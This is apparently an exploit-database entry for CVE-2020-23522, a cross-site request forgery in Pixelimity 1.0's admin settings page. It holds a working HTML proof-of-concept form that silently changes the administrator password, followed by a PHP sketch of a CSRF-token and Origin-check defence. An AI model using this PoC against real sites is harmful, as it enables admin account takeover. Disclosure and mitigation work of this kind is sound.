## https://sploitus.com/exploit?id=PACKETSTORM:161276
# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery  
# Date: 2020-06-03  
# Exploit Author: Noth  
# Vendor Homepage: https://github.com/pixelimity/pixelimity  
# Software Link: https://github.com/pixelimity/pixelimity  
# Version: v1.0  
# CVE : 2020-23522  
  
Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.  
  
PoC :  
  
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action="http://127.0.0.1/pixelimity-dev/admin/setting.php" method="POST">
<input type="hidden" name="submit_setting" value="Save Setting"/>
<input type="hidden" name="data[admin_portfolio_show]" value="5"/>
<input type="hidden" name="data[admin_pages_show]" value="5"/>
<input type="hidden" name="admin[data_password]" value="456789"/>
<input type="hidden" name="data[site_name]" value="Pixelimity"/>
<input type="hidden" name="data[site_name]show]" value="My Online Portfolio"/>
<input type="hidden" name="data[home_image_size]" value="5"/>
<input type="hidden" name="data[single_image_image_size]" value="240,0,0,auto"/>
<input type="hidden" name="data[single_image_image_size]" value="720,0,0,auto"/>
<input type="submit" value="Submit request"/>
</form>
</body>
</html>
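
A forged form like the one above is accepted when admin/setting.php authorizes the POST on the session cookie alone. The sketch below is an added example, not code from Pixelimity or from the exploit author: a per-session synchronizer token plus an Origin check placed in front of the settings save handler. The helper names, the csrf_token field and the https://portfolio.example origin are assumptions.

```php
<?php
// Added example, not Pixelimity code. Helper names, the csrf_token field
// and the site origin are hypothetical.
declare(strict_types=1);

// Issue (or reuse) a per-session token; call this when rendering the form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only when the submitted token equals the one stored in the session.
function csrf_token_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// Defense in depth: if the browser sent an Origin header, it must be ours.
function same_origin(array $server, string $siteOrigin): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $siteOrigin;
}

// SameSite=Strict keeps the session cookie off cross-site form posts.
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true]);
session_start();

$isSave = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && isset($_POST['submit_setting']);
if ($isSave) {
    if (!same_origin($_SERVER, 'https://portfolio.example')
        || !csrf_token_valid($_SESSION, $_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The existing settings-save code would run only past this point.
}

// Emit the hidden field inside the settings <form>.
$token = htmlspecialchars(csrf_token($_SESSION), ENT_QUOTES);
echo '<input type="hidden" name="csrf_token" value="' . $token . '">' . "\n";
```

Requiring the current password before a new one is accepted is a further check worth adding to the same handler.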